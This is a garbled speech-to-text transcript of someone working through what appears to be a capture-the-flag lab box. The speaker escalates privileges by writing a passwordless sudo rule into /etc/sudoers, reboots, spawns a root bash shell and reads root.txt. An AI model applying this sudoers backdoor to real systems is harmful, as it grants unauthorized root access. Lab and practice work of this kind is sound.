we were to do a, or can I do a sudo tech over here? Something kind of like that, right? But we want to do it in all. So we want to do all, right? All, and then we want to do equals root instead of Docker or Kali equals root, right? And then we want to do no password, correct? So there's no password needed for it, right? No password. Okay, and then we want that to go into the user bin sudo file, right? User bin sudo, and then we're going to throw that into Etsy sudoers. I think that should work if we throw that into Etsy sudoers. Let's try that. Okay, so now to exit out of this guy should be escape. Oh, okay. Cat and Zeno. I put the extra point afterwards. I always try to put it beforehand. There we go. Let's. Crap! It's not supposed to say start in, is it? This is supposed to be start. Execute start. Okay. Sudo tech-l. Sudo user bin reboot. And we'll give this a few minutes again. Now we should just be able to do a sudo. We should see user bin sudo on there. So we should just be able to sudo user bin sudo and get it like that, right? Or as root. Sudo tech u root sudo bin sudo because we did it as root, right? We did do it as root, right? Yeah. So it'd be sudo tech u root user bin sudo space / bin bash space tech p or whatever. Should get something like that. There we go. Rushing it. I should make one that says "Let's go," huh? I should get the It's Timmy's voice. You guys know what I'm talking about? I don't know if you guys ever heard of It's Timmy. How he does the "Let's go." Let's go! He has a pretty funny one. We should get It's Timmy and get a "Let's go" on there. Oh, sweet. Came right back on. That was much faster than last time, wasn't it? Let's go! Alright, sudo tac u root. And we're going to run user bin sudo for bin bash tac p, and we should be root. Let's frickin' go. Cat root.txt, and there we are. Let's get it. Putting in that heavy work. All right. There we go. Putting in work. DMX would have been proud. You've been very, very proud. I don't think I recorded a single second.